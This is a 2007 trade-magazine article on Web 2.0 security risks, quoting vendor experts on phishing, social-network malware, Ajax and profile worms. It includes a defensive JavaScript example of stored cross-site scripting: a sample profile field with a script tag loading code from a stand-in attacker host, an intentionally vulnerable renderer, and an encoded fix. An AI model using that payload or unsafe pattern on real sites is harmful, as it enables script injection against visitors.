Security in the social web age

Web 2.0 has been heralded as a major shift in the way members of society interact with one another. But with these new forms of collaboration come new and more dangerous threats. IT Weekly takes a look at how safe we really are.

By Administrator, published March 29, 2007

Every year, Time magazine honours the person who its editorial team feels has made the greatest contribution to the year's events. In 1981, its Person of the Year was the newly-launched personal computer; 15 years later it gave that award to You. Or rather, all of us. For Time, the biggest event of last year was the move towards "the new web" of Wikipedia, YouTube and MySpace: millions of users joining together in "collaboration and community on a scale never seen before" in the "massive social experiment" that is Web 2.0.

With such mainstream recognition, it is safe to say that Web 2.0 has now really arrived, bringing a more interactive and dynamic environment, more rich media content, and more collaboration between web application providers and end-users.

However, while organisations are now looking at ways of incorporating Web 2.0 technology and functionality into their existing web applications, this exciting new world comes with new dangers: the rush to get into the new wave of internet computing is creating a window of opportunity for newer, deadlier security attacks.

Security experts believe that we are already seeing the first signs of this.

Ivor Rankin, senior technical security practice manager for Symantec MENA, says that the firm is now seeing the emergence of a number of unique attack methods and techniques that have been used to exploit everything from social networks, such as MySpace, to Google search queries and other online environments.

Rankin says Symantec is seeing a wide range of attacks against social networking applications, such as instant messaging, with the goal of stealing information. He highlights phishing as a method of attack that continues to grow.

"There have also been attacks against specific services, such as MySpace and Wikipedia. The fact is attacks have occurred and will continue to occur," he says.

Many data and security specialists are predicting this year will see concealed, targeted attacks against specific organisations or individuals emerge as the biggest security concern.

The concern is that the very features that make Web 2.0 a success - better collaborative tools, social computing ability, and faster and broader information distribution - are the same things that will cause the greatest threats to both end-users and organisations.

"The web, in itself, is becoming a far more threatening place to spend time from a point of view of cyber-criminality and identity theft. We have seen a vast increase in the number of compromised computers that are on the internet at any given point in time," says Justin Doo, managing director at Trend Micro MEA.

"These PCs are being compromised either by receiving spam from malicious issuers, spam that contains malware like Trojans, backdoors and keyloggers, or by visiting web sites that are hosting downloadable content or content that would automatically download to your PC, without realising that it is happening," Doo adds.

A range of industry reports highlight the dangers of Web 2.0 sites. For instance, security firm ScanSafe says that, on average, up to one in 600 profile pages on social-networking sites host some form of malware.

Given that the number of profiles posted on sites such as MySpace.com or Friendster runs into the millions, the number of compromised profiles in any of those online communities is likely to be extremely high.

As another example, when Microsoft offered a free PC scanning tool last year, it discovered that of the 5.7 million consumers and small-business owners who used the free service, 62% of the computers scanned had at least one backdoor Trojan in them. About 35% of the bots that were implanted in these PCs came from opening attachments sent via e-mail, instant messages, or peer-to-peer web sites that share data files.

Most of the vulnerabilities in Web 2.0 applications originate from the use of a relatively new programming technique called Ajax (Asynchronous JavaScript and XML). Ajax combines client-side JavaScript with XML-formatted data exchange between browser and server, allowing web developers to make their sites far more interactive.

While Ajax helps make flashier web pages, the downside of using this technique is that it can just as easily aggravate security attacks on web sites and end-user PCs. Ajax-based web applications, which are more dynamic in nature and allow web page content to be updated "on the fly" without reloading the entire page, offer widespread opportunities for hackers to exercise their craft: every piece of content pulled in and rendered dynamically is another point at which untrusted data reaches the user's browser.

"The attacks are the same. We are still seeing Trojans, viruses and worms, but it has become a broader spectrum. In some cases, it is making it easier for the hackers because there are more holes, more points of entry into these applications because they are so interactive," says Tareque Choudhury, senior technical consultant with Secure Computing's EMEA division.

Some particular manifestations of these threats include the Yamanner worm that targeted Yahoo Mail, and the Samy and Spaceflash worms, which attacked MySpace profiles.
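The profile worms named above belong to the class of stored cross-site scripting bugs that arise when Ajax-fetched user content is injected straight into the page. The following is an added illustration written for this article, not code from any of the sites or products discussed: it renders a constructed profile record the way a vulnerable page would, beside an output-encoded version, and includes a simple check a reviewer can run over rendered fragments. All names and the sample record are hypothetical.

```javascript
// Added example (not from the article): why a profile page that injects
// Ajax-fetched user content with innerHTML is exposed to stored cross-site
// scripting, and how output encoding closes the hole.
// Runs under Node.js with no dependencies; the "Ajax response" is constructed.

// Constructed sample of what an XMLHttpRequest to a profile endpoint returns.
// The "about" field stands in for attacker-controlled profile text.
const SAMPLE_PROFILE_JSON = JSON.stringify({
  name: "alice",
  about: 'I love music <script src="http://attacker.example/w.js"></script>'
});

// Encode the five characters that matter in an HTML text or attribute context.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// VULNERABLE: equivalent to `panel.innerHTML = ...` in the browser. Any tags in
// `about` become live DOM, so the script runs for every visitor who views the
// profile; a worm uses that to rewrite the visitor's own profile and spread.
function renderProfileUnsafe(json) {
  const p = JSON.parse(json);
  return `<h2>${p.name}</h2><div class="about">${p.about}</div>`;
}

// HARDENED: every user-controlled value is encoded before it is placed in
// markup (in a real page, prefer `textContent` to `innerHTML` entirely).
function renderProfileSafe(json) {
  const p = JSON.parse(json);
  return `<h2>${escapeHtml(p.name)}</h2>` +
         `<div class="about">${escapeHtml(p.about)}</div>`;
}

// Review/test-suite check: a rendered fragment must contain no tag other than
// the ones the template itself emits. Anything else came from user data.
function containsForeignTag(html, allowed = ["h2", "div"]) {
  const tags = [...html.matchAll(/<\/?([a-zA-Z][a-zA-Z0-9]*)/g)]
    .map(m => m[1].toLowerCase());
  return tags.some(t => !allowed.includes(t));
}

console.log(containsForeignTag(renderProfileUnsafe(SAMPLE_PROFILE_JSON))); // true
console.log(containsForeignTag(renderProfileSafe(SAMPLE_PROFILE_JSON)));   // false
```

The same check can be pointed at a server-side template's output in a test, which catches a forgotten encoding call before it reaches production.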

Admittedly, so far there are only a few high-profile breaches, but nevertheless, it appears that more Ajax worms and other variations are in the offing.

So, what can companies do to protect themselves against this new breed of security attacks?

Given that an organisation's security is only as strong as its weakest link, Trend Micro's Doo stresses the importance of monitoring users' web behaviour.

"If you are encouraging users to interact with web sites that are hosting information for further download, then the content of those web sites itself needs to be monitored. We need to try and drive better user web behaviour. We need to encourage people to take fewer risks," he argues. "The problem most of us face is that we see the internet as an impersonal object, and many of us have never been hurt using the internet. Companies should have a more stringent approach when it comes to the traffic that goes in and out of the organisation."

Security in a Web 2.0 world, according to Rankin, should entail a change in the mindset of companies. Instead of focusing on protecting systems, he says, companies should be able to protect information irrespective of which system it resides on.

"It is critical that we need to adopt, as a strategy, a more holistic security solution that would protect not only the information that sits on a company's database but anywhere within the network, and effectively, anywhere on the internet," notes Rankin. "It is essential that companies should realise that their responsibility no longer ends within their perimeter but rather it now ends where the information sits, and that means potentially every PC of their customers, every PDA that their customers are using, and so on."

Clearly, there is a lot of work to be done to make Web 2.0 safe to use for everybody - that is, if we do not want the answer to the question of "what poses the greatest security threat" to be "You".
